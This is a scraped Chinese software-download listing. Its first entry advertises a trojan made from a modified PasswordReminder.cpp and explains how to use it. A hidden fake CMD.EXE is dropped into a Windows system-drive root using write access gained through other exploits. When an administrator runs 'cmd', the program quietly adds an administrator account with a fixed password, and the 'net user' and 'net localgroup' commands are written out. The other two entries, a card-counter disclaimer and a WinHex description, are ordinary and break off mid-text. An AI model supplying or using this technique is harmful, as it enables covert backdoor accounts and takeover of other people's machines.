你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-11
上传用户:qlpqlq
新浪斗地主记牌器 使用前请您先阅读以下条款: 1) 本站仅对原软件包“依样”打包,但不保证所提供软件或程序的完整性和安全性。 2) 请在使用前查毒 ,这也是您使用其它网络资源所必须注意的事项 。 3) 软件安装过程谨慎点击下一步操作,以免误安装你可能不需要的第三方插件或恶意软件。 4) 由本站提供的程序对您的网站或计算机造成严重后果的本站概不负责。 5) 转载本站提供的相关资源请勿删除本声明文件。 6) 本站提供的程序均为网上搜集,如果该程序涉及或侵害到您的版权请立即写信通知我们。 7) 欢迎再次到zdnet下载频道(download.zdnet.com.cn)下载您所需要的软件。 zdnet China(至顶网)下载频道是国内最早成立的专业软件下载网站,国外分站也遍及美国、英国、澳大利亚、日本等国家,为软件开发者提供了无可比拟的专业传播渠道,目前 zdnet China 已在国内设立了高速独立下载服务器,经历多年来的高速发展,现已成为国内影响力最大的软件资源中心。
标签: 软件包
上传时间: 2014-01-08
上传用户:PresidentHuang
WinHex 是一款以通用的 16 进制编辑器为核心,专门用来对付计算机取证、数据恢复、低级数据处理、以及 IT 安全性、各种日常紧急情况的高级工具: 用来检查和修复各种文件、恢复删除文件、硬盘损坏、数码相机卡损坏造成的数据丢失等。得到 zdnet Software Library 五星级最高评价,拥有强大的系统效用。功能包括 (依照授权类型): - 硬盘, 软盘, CD-ROM 和 DVD, ZIP, Smart Media, Compact Flash, 等磁盘编辑器… - 支
标签: 电磁测量
上传时间: 2013-07-06
上传用户:eeworm
